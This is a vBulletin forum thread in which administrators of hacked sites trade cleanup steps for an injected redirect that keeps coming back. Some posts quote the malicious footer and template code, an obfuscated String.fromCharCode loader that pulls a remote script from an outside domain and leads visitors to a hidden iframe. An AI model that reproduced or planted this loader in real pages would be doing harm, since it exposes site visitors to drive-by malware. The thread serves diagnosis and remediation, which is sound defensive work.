A fix if your site is already exploited

Collapse
X
 
  • Time
  • Show
Clear All
new posts

  • Jaxo
    replied
    just out of interest,.. how many people having this problem are with godaddy?

    Leave a comment:


  • cfages
    replied
    Originally posted by Mitchh
    Code:
    var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
    If you decode the numbers from the second fromCharCode() you get the following URL:



    This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus softwares like Avast complain about

    Did get the same problem... secret iframe that finally leads to http://directmarketingmanage.in/in.cgi?walter ... many antivirus of my visitors complained about it..

    via phpmyadmin I have found this code in 5 of my template... I have also found a strange "new" file in the root of the forum (verify_ojdojdosjdsj.php file) with some strange code in it (admins, if you want this file I can send it to you)

    I am under vBulletin 4.0.8 Patch Level 2 (vpublishing suite) So I will upgrade to the last version of vbulletin...

    For info I have 2 active plugins :
    - VBSEO (last version 3.6)
    - auto linker 1.1

    Blogs and CMS part of the publishing suite are disabled


    Any idea of how they came into the system? Any patch to prevent this in the future ?


    Regards
    chris

    Leave a comment:


  • Mr Jolly
    replied
    OK my host tell me that they removed a file called vbseo.php which they said was encoded with php but didn't have anything to do with vBSEO. Personally, I guessed that was a story to justify the $200 they charged me after I told them I'd managed to fix everything. But it might be relevant.

    I haven't seen this file or its contents.

    Leave a comment:


  • J3rico
    replied
    Hi, same problem for me, vBulletin 4.1.11, but the problems started with the 4.1.10. vBSEO has been updated with the patch released in January. I removed almost all the plugins/products (all products were updated to their latest version), deleted suspect file diagnostics, replaced any files not containing the expected contents, changed every password possible.
    In my case iframe are inserted in this files : init.php, content.php, vbulletin-core.js (this only with the 4.1.11 version).
    I put lots of rules in the file .htaccess, for 10 days there were no attacks, but since last friday have resumed.
    I know that's not fair to list the installed products, however, a cross-check can be of help.
    Sorry for my bad english.

    Leave a comment:


  • Zachery
    replied
    Third party addons? You cleaned the damage, but did you find the source? If you move to another software and the backdoor is still in place it wont matter.

    Your addons being up-2-date help, but its not 100% if the problem is resolved. The addons you're running might still have issues, if the developer hasn't fixed them, or worse doesn't know about them.

    Leave a comment:


  • Joey805
    replied
    I got hit with the same bug too, cleaned it and now its back again 1 day later. I re-uploaded all my vbulletin files, changed every password possible, make sure any plugins I am running are up to date and they STILL got in.

    How the heck can we stop this from happening again? I'm about ready to start looking at other forum software.

    Leave a comment:


  • dadoc
    replied
    Hello,

    I know that this problem has effected most versions of vBulletin
    You guys are talking about the 4x version but it all sounds very similar to what happened to my forum

    I am old 3x version and I am not here to tell you what the problem is or how to fix it, but

    I have been in battle with a crazy redirect which has been on for about 2 weeks,

    It is hard to read through all the forums and see what others have said to do and because it is a ongoing problem
    there are little updated fixes

    I dont know if the problem is vBulletin or vbseo (which I have installed latest version)

    what fixed my problem was

    1. doing a full re instal of vbseo all files

    2. changed passwords to everything eg. forumcp database cpannel vbseocp and others (make sure to edit config for new passwords)

    3. changing permissions to all config files forum and vbseo I had done this via ftp but after much trial and error found that this had to be done via cpanel - file manager dont know why just worked!

    4. I could not get my warning message in my vbseocp to change until I did the permission change for the config file via cpanel (the message was saying that you should edit your config permissions to securer your site) once I did it removed the message.


    I hope this may help someone, and I am still looking into some changes that have been mate to my database
    extra tables were added, related to tags, I dont know much about these tables other than I did not create them and they were created
    about the same time as I started to have problems.

    You can have a look at a screen shot here if you want to see them



    Like I said I have no answers and dont know the cause, but this worked for me

    Regards
    Ryan

    Leave a comment:


  • CountRock
    replied
    Originally posted by Mr Jolly
    If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.
    Did what the 1st post said! fixed for the time being.

    Leave a comment:


  • Mr Jolly
    replied
    Originally posted by CountRock
    Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?

    Code:
    [TABLE]
    [TR]
    [TD="class: webkit-line-content"]    <script type="text/javascript">[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]    <!--[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]        // Main vBulletin Javascript Initialization[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]        var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]    //-->[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]    </script>[/TD]
    [/TR]
    [/TABLE]
    If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.

    Leave a comment:


  • Mr Jolly
    replied
    Originally posted by Wayne Luke
    Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.
    I opened a ticket and was asked to pay $80 before you'd look at it. Then I was directed to the forums.

    I did pay $100 for the publishing suite upgrade so I could get support for this, but no one replied to my ticket and fortunately this thread was posted and the problem was solved.

    I gave vBulletin full access to my server, all the passwords they could possibly need.

    Leave a comment:


  • CountRock
    replied
    Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However still getting this following Java script in the footer file. Re-building the footer by saving it didnt work. What can I do?

    Code:
    [TABLE]
    [TR]
    [TD="class: webkit-line-content"]	<script type="text/javascript">[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]	<!--[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]		// Main vBulletin Javascript Initialization[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]		var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]	//-->[/TD]
    [/TR]
    [TR]
    [TD="class: webkit-line-number"][/TD]
    [TD="class: webkit-line-content"]	</script>[/TD]
    [/TR]
    [/TABLE]

    Leave a comment:


  • tagthis
    replied
    Originally posted by Diablotic
    I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

    I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
    Let us know how it goes. I've looked at the fix and for some reason i don't have a
    /vbseo/includes/functions_vbseocp_abstract.php

    file. So i can't apply it. Also the link to their testing utility (v3) isn't working by the looks of it.

    Wayne, i'll open a support ticket if it comes back again.

    Leave a comment:


  • Wayne Luke
    replied
    Originally posted by tagthis
    VB - any word on finding how they're doing this?
    Nope... Not enough information given, no access to any of the sites with this issue. There is a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well but most people don't even save those for more than 24 hours.

    Leave a comment:


  • Diablotic
    replied
    I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

    I will fix it now, remove the malicious code and see if it's back again today or tomorrow.

    Leave a comment:


  • tagthis
    replied
    Originally posted by Diablotic
    This is mad, I have excatly the same issue for few days now and have no idea what is causing it. Please help.
    Open your footer template in the style you're using and then click save and close. This rebuilds the file and removes the exploit. This is however just a work around to remove it and doesn't fix the root cause.

    +1 for the same exploit.

    VB - any word on finding how they're doing this?

    We're running VB/CMS 4.1.8 + vbSEO 3.6.0 and that's about it.

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...